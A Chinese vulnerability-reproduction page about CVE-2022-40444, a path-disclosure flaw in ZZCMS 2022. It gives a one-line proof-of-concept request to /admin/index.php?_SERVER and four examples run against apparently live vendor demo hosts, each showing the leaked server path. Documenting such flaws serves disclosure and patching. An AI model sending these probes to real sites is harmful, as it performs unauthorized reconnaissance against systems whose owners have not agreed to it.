!
也想出现在这里? 联系我们
广告位
当前位置:首页>安全咨询>漏洞复现>ZZCMS 2022信息泄露漏洞CVE-2022-40444

ZZCMS 2022信息泄露漏洞CVE-2022-40444

漏洞描述 
ZZCMS是中国ZZCMS团队的一套内容管理系统(CMS)。

ZZCMS 2022存在信息泄露漏洞,该漏洞源于程序对于敏感信息保护不足,攻击者可利用该漏洞通过向"/admin/index php?_Server"发送请求来获取服务器返回的错误信息,显示应用程序的位置(绝对路径)。
 


 

影响版本

ZZCMS 2022

 


 

漏洞复现

供应商主页:
http://www.zzcms.net/

软件链接:
http://www.zzcms.net/download/zzcms2022.zip

https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

受影响的页面:
所有包含页面 /admin/index php?_Server 的页面

POC
请求/admin/index php?_Server”,服务器返回的响应错误信息,显示应用程序的位置(绝对路径)。

例如:
需要使用中国IP地址访问
案例1
请求http://demo.zzcms.net/admin/index.php?_SERVER

ZZCMS 2022信息泄露漏洞CVE-2022-40444

响应包含:警告: /www/users/HA165388/WEB/inc/global.php中的非法字符串偏移量“REQUEST_URI

ZZCMS 2022信息泄露漏洞CVE-2022-40444

案例2
请求http://3158.zzcms.net/admin/index.php?_SERVER

ZZCMS 2022信息泄露漏洞CVE-2022-40444

响应包含:警告: D:zzcms_xmincglobal.php中的非法字符串偏移 'REQUEST_URI'

ZZCMS 2022信息泄露漏洞CVE-2022-40444

案例3
请求http://9.zzcms.net/admin/index.php?_SERVER

ZZCMS 2022信息泄露漏洞CVE-2022-40444

响应包含:警告: D:jiuincglobal.php中的非法字符串偏移 'REQUEST_URI'

ZZCMS 2022信息泄露漏洞CVE-2022-40444

案例4
请求http://hzp.zzcms.net/admin/index.php?_SERVER

ZZCMS 2022信息泄露漏洞CVE-2022-40444

响应包含:警告: D:hzpincglobal.php中的非法字符串偏移 'REQUEST_URI'

ZZCMS 2022信息泄露漏洞CVE-2022-40444

 

给TA打赏
共{{data.count}}人
人已打赏
漏洞复现

zzcms 2022绝对路径信息泄露漏洞

2022-10-8 22:08:00

漏洞复现

大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞

2022-10-8 22:08:51

声明 本站上的部份代码及教程来源于互联网,仅供网友学习交流,若您喜欢本文可附上原文链接随意转载。无意侵害您的权益,请发送邮件至 admin@s9h.cn 或点击右侧 私信:少羽 反馈,我们将尽快处理。
0 条回复A文章作者M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索